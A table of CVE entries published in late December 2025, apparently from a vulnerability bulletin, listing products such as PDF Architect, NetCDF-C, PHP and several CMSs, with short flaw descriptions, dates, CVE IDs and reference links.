| --ETL Systems Ltd DEXTRA Series ' Digital L-Band Distribution System v1.8 | The web management interface in ETL Systems Ltd DEXTRA Series ' Digital L-Band Distribution System v1.8 does not implement Cross-Site Request Forgery (CSRF) protection mechanisms (no tokens, no Origin/Referer validation) on critical configuration endpoints. | 2025-12-26 | not yet calculated | CVE-2025-67013 | https://www.etlsystems.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-67013%20_%20ETL%20Systems%20Ltd%20DEXTRA%20Series%20_%20CSRF |
| FluentCMS--FluentCMS 1.2.3. | A cross-site scripting (XSS) vulnerability was identified in FluentCMS 1.2.3. After logging in as an admin and navigating to the "Add Page" function, the application fails to properly sanitize input in the <head> section, allowing remote attackers to inject arbitrary script tags. | 2025-12-26 | not yet calculated | CVE-2025-67349 | https://github.com/fluentcms/FluentCMS/issues/2403 https://github.com/eoniboogie/CVE_Disclosures/blob/main/CVE-2025-67349/CVE-2025-67349.md |
| FuguHub--FuguHub 8.1 | A reflected cross-site scripting (XSS) vulnerability exists in FuguHub 8.1 when serving SVG files through the /fs/ file manager interface. FuguHub does not sanitize or restrict script execution inside SVG content. When a victim opens a crafted SVG containing an inline <script> element, the browser executes the attacker-controlled JavaScript. | 2025-12-22 | not yet calculated | CVE-2025-65790 | https://fuguhub.com/ https://github.com/hunterxxx/FuguHub-8.1-Reflected-SVG-XSS-CVE-2025-65790 |
| GNU--GNU Unrtf v0.21.10 | A stack overflow in the src/main.c component of GNU Unrtf v0.21.10 allows attackers to cause a Denial of Service (DoS) via injecting a crafted input into the filename parameter. | 2025-12-23 | not yet calculated | CVE-2025-65410 | https://www.gnu.org/software/unrtf/ https://lists.gnu.org/archive/html/bug-unrtf/2025-11/msg00001.html https://savannah.gnu.org/projects/unrtf/ https://hg.savannah.gnu.org/hgweb/unrtf/rev/a5d3b025a8b1 |
| --GT Edge AI Platform before v2.0.10 | Insecure permissions in the /api/v1/agents API of GT Edge AI Platform before v2.0.10-dev allows unauthorized attackers to access sensitive information. | 2025-12-22 | not yet calculated | CVE-2025-63662 | https://github.com/p80n-sec/Vulnerability-Research/blob/main/Pending https://gist.github.com/p80n-sec/48ce34c929e8b946f0ad25f76e7b8cef |
| --GT Edge AI Platform before v2.0.10 | Incorrect access control in the /api/v1/conversations/*/files API of GT Edge AI Platform before v2.0.10 allows unauthorized attackers to access other users' uploaded files. | 2025-12-22 | not yet calculated | CVE-2025-63663 | https://github.com/p80n-sec/Vulnerability-Research/blob/main/Pending https://gist.github.com/p80n-sec/f3ca933480157cb4e18c387d92f4d0c2 |
| --GT Edge AI Platform before v2.0.10 | Incorrect access control in the /api/v1/conversations/*/messages API of GT Edge AI Platform before v2.0.10-dev allows unauthorized attackers to access other users' message history with AI agents. | 2025-12-22 | not yet calculated | CVE-2025-63664 | https://github.com/p80n-sec/Vulnerability-Research/blob/main/Pending https://gist.github.com/p80n-sec/0a0a71a2190d5e6f8083bf6069e7b5f2 |
| --Home Assistant Core before v2025.8.0 | Home Assistant Core before v2025.8.0 is vulnerable to Directory Traversal. The Downloader integration does not fully validate file paths during concatenation, leaving a path traversal vulnerability. | 2025-12-23 | not yet calculated | CVE-2025-65713 | https://github.com/home-assistant/core/pull/150046 https://gist.github.com/GenoWang/7359360285e0fe21a7a58d10ff71d032 |
| --K7 Ultimate Security 17.0.2045. | An issue was discovered in K7 Ultimate Security 17.0.2045. A Local Privilege Escalation (LPE) vulnerability in the K7 Ultimate Security antivirus can be exploited by a local unprivileged user on default installations of the product. Insecure access to a named pipe allows unprivileged users to edit any registry key, leading to a full compromise as SYSTEM. | 2025-12-22 | not yet calculated | CVE-2025-67826 | https://www.k7computing.com/ https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-22nd-Dec-2025 |
| --Keyfactor SignServer versions prior to 7.2. | An error in the SignServer container startup logic was found in Keyfactor SignServer versions prior to 7.2. The Admin CLI command used to configure Certificate access to the initial startup of the container sets a property of "allowany" to allow any user with a valid and trusted client auth certificate to connect. Admins can then set more restricted access to specific certificates. A logic error caused this admin CLI command to be run on each restart of the container instead of only the first startup as intended resetting the configuration to "allowany". | 2025-12-22 | not yet calculated | CVE-2025-26787 | https://support.keyfactor.com/hc/en-us/articles/33997706776987-SignServer-security-advisory-Container-vulnerability-CVE-2025-26787-fixed-in-version-7-2 https://docs.keyfactor.com/signserver/latest/signserver-7-2-release-notes |
| Krishanmuraiji--krishanmuraiji SMS v.1.0 | SQL injection vulnerability in krishanmuraiji SMS v.1.0, within the /studentms/admin/edit-class-detail.php via the editid GET parameter. An attacker can trigger controlled delays using SQL SLEEP() to infer database contents. Successful exploitation may lead to full database compromise, especially within an administrative module. | 2025-12-26 | not yet calculated | CVE-2025-66947 | https://github.com/kabir0104k/CVE-2025-66947/blob/main/README.md |
| libxmljs--libxmljs 1.0.11 | A vulnerability exists in the libxmljs 1.0.11 when parsing a specially crafted XML document. Accessing the internal _ref property on entity_ref and entity_decl nodes causes a segmentation fault, potentially leading to a denial-of-service (DoS). | 2025-12-26 | not yet calculated | CVE-2025-25341 | https://github.com/libxmljs/libxmljs/issues/667 |
| Linksys--Linksys E5600 V1.1.0.26 | Linksys E5600 V1.1.0.26 is vulnerable to command injection in the runtime.macClone function via the mc.ip parameter. | 2025-12-23 | not yet calculated | CVE-2025-29228 | https://github.com/JZP018/Vuln/blob/main/linsys/E5600/CI_macClone_mc.ip/CI_macClone_mc.ip.md |
| Linksys--Linksys E5600 V1.1.0.26 | linksys E5600 V1.1.0.26 is vulnerable to command injection in the function ddnsStatus. | 2025-12-23 | not yet calculated | CVE-2025-29229 | https://github.com/JZP018/Vuln/blob/main/linsys/E5600/CI_ddnsStatus/CI_ddnsStatus.md |
| n--LSC Smart Connect Indoor IP Camera 1.4.13 | LSC Smart Connect Indoor IP Camera 1.4.13 contains a RCE vulnerability in start_app.sh. | 2025-12-22 | not yet calculated | CVE-2025-65817 | https://github.com/Istaarkk/CVE-2025-65817/blob/main/README.md |
| --Media module of Piranha CMS v12.1 | A stored cross-site scripting (XSS) vulnerability in the Media module of Piranha CMS v12.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name field. | 2025-12-22 | not yet calculated | CVE-2025-67291 | http://piranha.com https://github.com/vuquyen03/CVE/tree/main/CVE-2025-67291 |
| MynNET--MyNET up to v26.05 | MyNET up to v26.05 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the src parameter. | 2025-12-22 | not yet calculated | CVE-2024-25812 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://github.com/am0nt31r0/Common-Vulnerabilities-and-Exposures-CVE-/blob/main/MyNet.md |
| MyNET--MyNET up to v26.05 | MyNET up to v26.05 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the msg parameter. | 2025-12-22 | not yet calculated | CVE-2024-25814 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://github.com/am0nt31r0/Common-Vulnerabilities-and-Exposures-CVE-/blob/main/MyNet.md |
| MyNET--MyNET up to v26.06 | Iframe injection vulnerability in airc.pt/solucoes-servicos.solucoes MyNET v.26.06 and before allows a remote attacker to execute arbitrary code via the src parameter. | 2025-12-22 | not yet calculated | CVE-2024-27708 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://github.com/esquim0/Common_Vulnerabilities_and_Exposures_CVE/blob/main/2024/MyNet.md |
| MyNET--MyNET up to v26.08 | MyNET up to v26.08 was discovered to contain a Reflected cross-site scripting (XSS) vulnerability via the msgtipo parameter. | 2025-12-22 | not yet calculated | CVE-2024-35321 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://github.com/am0nt31r0/Common-Vulnerabilities-and-Exposures-CVE-/blob/main/MyNet.md https://github.com/Manuel-arc/Common-Vulnerabilities-and-Exposures-CVE-/blob/main/MyNet.md |
| MyNET--MyNET up to v26.08 | MyNET up to v26.08 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the ficheiro parameter. | 2025-12-24 | not yet calculated | CVE-2024-35322 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://miguelsantareno.github.io/airc_exploit.txt |
| MyNET--MyNET up to v26.08 | A reflected cross-site scripting (XSS) vulnerability in MyNET up to v26.08 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the parameter HTTP. | 2025-12-24 | not yet calculated | CVE-2024-40317 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://miguelsantareno.github.io/airc_exploit.txt |
| MyNET--MyNET up to v26.08.316 | MyNET up to v26.08.316 was discovered to contain an Unauthenticated SQL Injection vulnerability via the intmenu parameter. | 2025-12-24 | not yet calculated | CVE-2024-39037 | https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN https://miguelsantareno.github.io/airc_exploit.txt |
| Netgear--Netgear EX8000 V1.0.0.126 | Netgear EX8000 V1.0.0.126 is vulnerable to Command Injection via the iface parameter in the action_bandwidth function. | 2025-12-23 | not yet calculated | CVE-2025-45493 | https://github.com/JZP018/vuln03/blob/main/netgear/EX8000/cve-netgear_EX8000_CI_action_bandwidth.pdf https://github.com/JZP018/vuln03/blob/main/netgear/EX8000/netgear_EX8000_CI_action_bandwidth.mp4 |
| Netgear--Netgear EX8000 V1.0.0.126 | Netgear EX8000 V1.0.0.126 was discovered to contain a command injection vulnerability via the switch_status function. | 2025-12-23 | not yet calculated | CVE-2025-50526 | https://github.com/JZP018/vuln03/blob/main/netgear/EX8000/cve-netgear_EX8000_CI_switch_status.pdf https://github.com/JZP018/vuln03/blob/main/netgear/EX8000/netgear_EX8000_CI_switch_status.mp4 |
| --Page Settings module of Piranha CMS v12.1 | A stored cross-site scripting (XSS) vulnerability in the Page Settings module of Piranha CMS v12.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Excerpt field. | 2025-12-22 | not yet calculated | CVE-2025-67290 | http://piranha.com https://github.com/vuquyen03/CVE/tree/main/CVE-2025-67290 |
| --PluXml CMS 5.8.22 | Authenticated Remote Code Execution (RCE) in PluXml CMS 5.8.22 allows an attacker with administrator panel access to inject a malicious PHP webshell into a theme file (e.g., home.php). | 2025-12-22 | not yet calculated | CVE-2025-67436 | https://github.com/pluxml/PluXml https://github.com/RajChowdhury240/CVE-2025-67435/ |
| --PublicCMS V5.202506.b | PublicCMS V5.202506.b is vulnerable to Cross Site Scripting (XSS) in the Content Search module. | 2025-12-22 | not yet calculated | CVE-2025-65837 | https://github.com/Hyperkopite/PublicCMS_Vulns/blob/main/XSS_1.md https://github.com/sanluan/PublicCMS/issues/100 |
| --RTPS protocol implementation of OpenDDS DDS before v3.33.0 | An integer overflow in the RTPS protocol implementation of OpenDDS DDS before v3.33.0 allows attackers to cause a Denial of Service (DoS) via a crafted message. | 2025-12-23 | not yet calculated | CVE-2025-67111 | https://github.com/lkloliver/poc/blob/main/POC_OpenDDS.md https://gist.github.com/lkloliver/fcc5da83b4cba137ce95177a9afc4126 |
| RuoYi--RuoYi v.4.7.9 | SQL Injection vulnerability in RuoYi v.4.7.9 and before allows a remote attacker to execute arbitrary code via the createTable function in SqlUtil.java. | 2025-12-23 | not yet calculated | CVE-2024-57521 | https://gitee.com/y_project/RuoYi/commit/ddd858ca732618a472b10eaab2f8e4b45812ffc5 https://gitee.com/y_project/RuoYi/issues/IBC976 https://github.com/mrlihd/Ruoyi-4.7.9-SQL-Injection-PoC https://github.com/mrlihd/CVE-2024-57521-SQL-Injection-PoC/blob/main/README.md |
| Schlix--Schlix CMS before v2.2.9-5 | Schlix CMS before v2.2.9-5 is vulnerable to Cross Site Scripting (XSS). Due to lack of javascript sanitization in the login form, incorrect login attempts in logs are triggered as XSS in the admin panel. | 2025-12-22 | not yet calculated | CVE-2025-67443 | https://www.schlix.com/news/release/december-2025-errata-5-bug-fix-release.html#:~:text=Fixed%20XSS%20vulnerability%20bug%20when%20clicking%20New%20User%20%28thank%20you%20to%20Ak%C4%B1ner%20K%C4%B1sa%20who%20reported%20this%20security%20bug%20and%20provided%20reasonable%20time%20to%20fix%29 https://gist.github.com/akinerkisa/b22f4517a4011d049c5fc7fd3b29c9f2 |
| Speedify--Speedify VPN up to v15.0.0 | A command injection vulnerability in the me.connectify.SMJobBlessHelper XPC service of Speedify VPN up to v15.0.0 allows attackers to execute arbitrary commands with root-level privileges. | 2025-12-23 | not yet calculated | CVE-2025-25364 | https://connectify.me https://speedify.com/ https://speedify.com/blog/news/speedify-macos-vpn-application-vulnerability/ |
| TechStore--TechStore version 1.0. | A reflected Cross-Site Scripting (XSS) vulnerability has been identified in TechStore version 1.0. The user_name endpoint reflects the id query parameter directly into the HTML response without output encoding or sanitization, allowing execution of arbitrary JavaScript code in a victim's browser. | 2025-12-23 | not yet calculated | CVE-2025-66845 | https://gist.github.com/MuratSevri/d78efed86ca5f82e8a6683ace5061319 |
| Terra--Terra Informatica Software, Inc Sciter v.4.4.7.0 | An issue in Terra Informatica Software, Inc Sciter v.4.4.7.0 allows a local attacker to obtain sensitive information via the adopt component of the Sciter video rendering function. | 2025-12-26 | not yet calculated | CVE-2024-29720 | https://github.com/sciter-sdk/rust-sciter/issues/143 |
| Umbraco--Umbraco CMS v16.3.3 | An arbitrary file upload vulnerability in Umbraco CMS v16.3.3 allows attackers to execute arbitrary code via uploading a crafted PDF file. | 2025-12-22 | not yet calculated | CVE-2025-67288 | http://umbraco.com https://github.com/vuquyen03/CVE/tree/main/CVE-2025-67288 |
| Webmail--Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1 | A Local File Inclusion (LFI) vulnerability exists in the Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1 because of improper handling of user-supplied request parameters in the RestFilter servlet. An unauthenticated remote attacker can craft requests to the /h/rest endpoint to influence internal request dispatching, allowing inclusion of arbitrary files from the WebRoot directory. | 2025-12-22 | not yet calculated | CVE-2025-68645 | https://wiki.zimbra.com/wiki/Security_Center https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy |
| Xionmai--Xiongmai XM530 IP cameras on Firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 | Authentication bypass vulnerability in Xiongmai XM530 IP cameras on Firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 allows unauthenticated remote attackers to access sensitive device information and live video streams. The ONVIF implementation fails to enforce authentication on 31 critical endpoints, enabling direct unauthorized video stream access. | 2025-12-22 | not yet calculated | CVE-2025-65856 | http://ip.com http://hangzhou.com https://luismirandaacebedo.github.io/CVE-2025-65856/ |
| Xiongmai--Xiongmai XM530 IP cameras on firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06. | An issue was discovered in Xiongmai XM530 IP cameras on firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06. The GetStreamUri exposes RTSP URIs containing hardcoded credentials enabling direct unauthorized video stream access. | 2025-12-22 | not yet calculated | CVE-2025-65857 | http://ip.com http://hangzhou.com https://luismirandaacebedo.github.io/CVE-2025-65857/ |
| Yealink--Yealink T21P_E2 Phone 52.84.0.15 | Yealink T21P_E2 Phone 52.84.0.15 is vulnerable to Directory Traversal. A remote normal privileged attacker can read arbitrary files via a crafted request result read function of the diagnostic component. | 2025-12-26 | not yet calculated | CVE-2025-66737 | http://yealink.com https://drive.google.com/file/d/1MpxnCL4koKupqWWDmY3ljlybjIPD8ieD/view?usp=sharing |
| Yealink--Yealink T21P_E2 Phone 52.84.0.15 | An issue in Yealink T21P_E2 Phone 52.84.0.15 allows a remote normal privileged attacker to execute arbitrary code via a crafted request the ping function of the diagnostic component. | 2025-12-26 | not yet calculated | CVE-2025-66738 | http://yealink.com https://drive.google.com/file/d/13t5ywSPJMx4487njJcH3ZTNuc_k3h4ty/view?usp=sharing |
| youlai--youlai-boot V2.21.1 | youlai-boot V2.21.1 is vulnerable to Incorrect Access Control. The getRoleForm function in SysRoleController.java does not perform permission checks, which may allow non-root users to directly access root roles. | 2025-12-22 | not yet calculated | CVE-2025-66735 | https://gitee.com/youlaiorg/youlai-boot/issues/ICH8FR https://gitee.com/youlaiorg/youlai-boot/commit/9197065102f92264ded814a9d3e9f2a4ff0da121 https://gist.github.com/old6ma/dc9e6e4a693d12c1a35fd4e1d21d4743 |
| youlai--youlai-boot V2.21.1 | youlai-boot V2.21.1 is vulnerable to Incorrect Access Control. The importUsers function in SysUserController.java does not perform a permission check on the current user's identity, which may allow regular users to import user data into the database, resulting in an authorization bypass vulnerability. | 2025-12-22 | not yet calculated | CVE-2025-66736 | https://gitee.com/youlaiorg/youlai-boot/commit/9197065102f92264ded814a9d3e9f2a4ff0da121 https://gitee.com/youlaiorg/youlai-boot/issues/ICH8FV https://gist.github.com/old6ma/be1d4a5373ee2de901ed4c8d81485046 |
| Nawawi Jamili--Docket Cache | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Nawawi Jamili Docket Cache docket-cache allows PHP Local File Inclusion.This issue affects Docket Cache: from n/a through <= 24.07.03. | 2025-12-24 | not yet calculated | CVE-2025-68506 | https://vdp.patchstack.com/database/Wordpress/Plugin/docket-cache/vulnerability/wordpress-docket-cache-plugin-24-07-03-local-file-inclusion-vulnerability?_s_id=cve |
| NSF Unidata--NetCDF-C | NSF Unidata NetCDF-C Time Unit Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of time units. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27273. | 2025-12-23 | not yet calculated | CVE-2025-14932 | ZDI-25-1153 |
| NSF Unidata--NetCDF-C | NSF Unidata NetCDF-C NC Variable Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of NC variables. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27266. | 2025-12-23 | not yet calculated | CVE-2025-14933 | ZDI-25-1151 |
| NSF Unidata--NetCDF-C | NSF Unidata NetCDF-C Variable Name Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of variable names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27267. | 2025-12-23 | not yet calculated | CVE-2025-14934 | ZDI-25-1152 |
| NSF Unidata--NetCDF-C | NSF Unidata NetCDF-C Dimension Name Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of dimension names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27168. | 2025-12-23 | not yet calculated | CVE-2025-14935 | ZDI-25-1154 |
| NSF Unidata--NetCDF-C | NSF Unidata NetCDF-C Attribute Name Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of attribute names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27269. | 2025-12-23 | not yet calculated | CVE-2025-14936 | ZDI-25-1155 |
| Open Design Alliance--ODA Drawings SDK - All Versions < 2026.12 | A Use of Uninitialized Variable vulnerability exists in Open Design Alliance Drawings SDK static versions (mt) before 2026.12. Static object `COdaMfcAppApp theApp` may access `OdString::kEmpty` before its initialization. Due to undefined initialization order of static objects across translation units (Static Initialization Order Fiasco), the application accesses uninitialized memory. This results in application crash on startup, causing denial of service. Due to undefined behavior, memory corruption and potential arbitrary code execution cannot be ruled out in specific exploitation scenarios. | 2025-12-22 | not yet calculated | CVE-2025-10021 | https://www.opendesign.com/security-advisories |
| pavothemes--Bookory | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in pavothemes Bookory bookory allows PHP Local File Inclusion. This issue affects Bookory: from n/a through <= 2.2.7. | 2025-12-24 | not yet calculated | CVE-2025-68530 | https://vdp.patchstack.com/database/Wordpress/Theme/bookory/vulnerability/wordpress-bookory-theme-2-2-7-local-file-inclusion-vulnerability?_s_id=cve |
| pdfforge--PDF Architect | pdfforge PDF Architect DOC File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of DOC files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27503. | 2025-12-23 | not yet calculated | CVE-2025-14416 | ZDI-25-1073 |
| pdfforge--PDF Architect | pdfforge PDF Architect Launch Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the implementation of the Launch action. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27501. | 2025-12-23 | not yet calculated | CVE-2025-14417 | ZDI-25-1074 |
| pdfforge--PDF Architect | pdfforge PDF Architect XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27502. | 2025-12-23 | not yet calculated | CVE-2025-14418 | ZDI-25-1075 |
| pdfforge--PDF Architect | pdfforge PDF Architect PDF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27902. | 2025-12-23 | not yet calculated | CVE-2025-14419 | ZDI-25-1076 |
| pdfforge--PDF Architect | pdfforge PDF Architect CBZ File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CBZ files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27514. | 2025-12-23 | not yet calculated | CVE-2025-14420 | ZDI-25-1077 |
| pdfforge--PDF Architect | pdfforge PDF Architect PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of pdfforge PDF Architect. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-27915. | 2025-12-23 | not yet calculated | CVE-2025-14421 | ZDI-25-1078 |
| PDFsam--Enhanced | PDFsam Enhanced App Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of App objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27260. | 2025-12-23 | not yet calculated | CVE-2025-14401 | ZDI-25-1089 |
| PDFsam--Enhanced | PDFsam Enhanced DOC File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of DOC files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27499. | 2025-12-23 | not yet calculated | CVE-2025-14402 | ZDI-25-1090 |
| PDFsam--Enhanced | PDFsam Enhanced Launch Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the implementation of the Launch action. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27500. | 2025-12-23 | not yet calculated | CVE-2025-14403 | ZDI-25-1091 |
| PDFsam--Enhanced | PDFsam Enhanced XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDFsam Enhanced. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27498. | 2025-12-23 | not yet calculated | CVE-2025-14404 | ZDI-25-1092 |
| PDFsam--Enhanced | PDFsam Enhanced Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows phyiscally-present attackers to escalate privileges on affected installations of PDFsam Enhanced. An attacker must first obtain the ability to mount a malicious drive onto the target system in order to exploit this vulnerability. The specific flaw exists within the configuration of OpenSSL. The product loads an OpenSSL configuration file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27867. | 2025-12-23 | not yet calculated | CVE-2025-14405 | ZDI-25-1093 |
| PHP Group--PHP | In PHP versions:8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, 8.5.* before 8.5.1, the getimagesize() function may leak uninitialized heap memory into the APPn segments (e.g., APP1) when reading images in multi-chunk mode (such as via php://filter). This occurs due to a bug in php_read_stream_all_chunks() that overwrites the buffer without advancing the pointer, leaving tail bytes uninitialized. This may lead to information disclosure of sensitive heap data and affect the confidentiality of the target server. | 2025-12-27 | not yet calculated | CVE-2025-14177 | https://github.com/php/php-src/security/advisories/GHSA-3237-qqm7-mfv7 |
| PHP Group--PHP | In PHP versions 8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, 8.5.* before 8.5.1 when using the PDO PostgreSQL driver with PDO::ATTR_EMULATE_PREPARES enabled, an invalid character sequence (such as \x99) in a prepared statement parameter may cause the quoting function PQescapeStringConn to return NULL, leading to a null pointer dereference in pdo_parse_params() function. This may lead to crashes (segmentation fault) and affect the availability of the target server. | 2025-12-27 | not yet calculated | CVE-2025-14180 | https://github.com/php/php-src/security/advisories/GHSA-8xr5-qppj-gvwj |
| PickPlugins--Post Grid and Gutenberg Blocks | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins Post Grid and Gutenberg Blocks post-grid allows Stored XSS. This issue affects Post Grid and Gutenberg Blocks: from n/a through <= 2.3.18. | 2025-12-24 | not yet calculated | CVE-2025-68605 | https://vdp.patchstack.com/database/Wordpress/Plugin/post-grid/vulnerability/wordpress-post-grid-and-gutenberg-blocks-plugin-2-3-18-cross-site-scripting-xss-vulnerability?_s_id=cve |
| pixelgrade--Category Icon | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pixelgrade Category Icon category-icon allows Stored XSS. This issue affects Category Icon: from n/a through <= 1.0.2. | 2025-12-24 | not yet calculated | CVE-2025-68525 | https://vdp.patchstack.com/database/Wordpress/Plugin/category-icon/vulnerability/wordpress-category-icon-plugin-1-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| pluginsware--Advanced Classifieds & Directory Pro | Cross-Site Request Forgery (CSRF) vulnerability in pluginsware Advanced Classifieds & Directory Pro advanced-classifieds-and-directory-pro allows Cross Site Request Forgery.This issue affects Advanced Classifieds & Directory Pro: from n/a through <= 3.2.9. | 2025-12-24 | not yet calculated | CVE-2025-68580 | https://vdp.patchstack.com/database/Wordpress/Plugin/advanced-classifieds-and-directory-pro/vulnerability/wordpress-advanced-classifieds-directory-pro-plugin-3-2-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
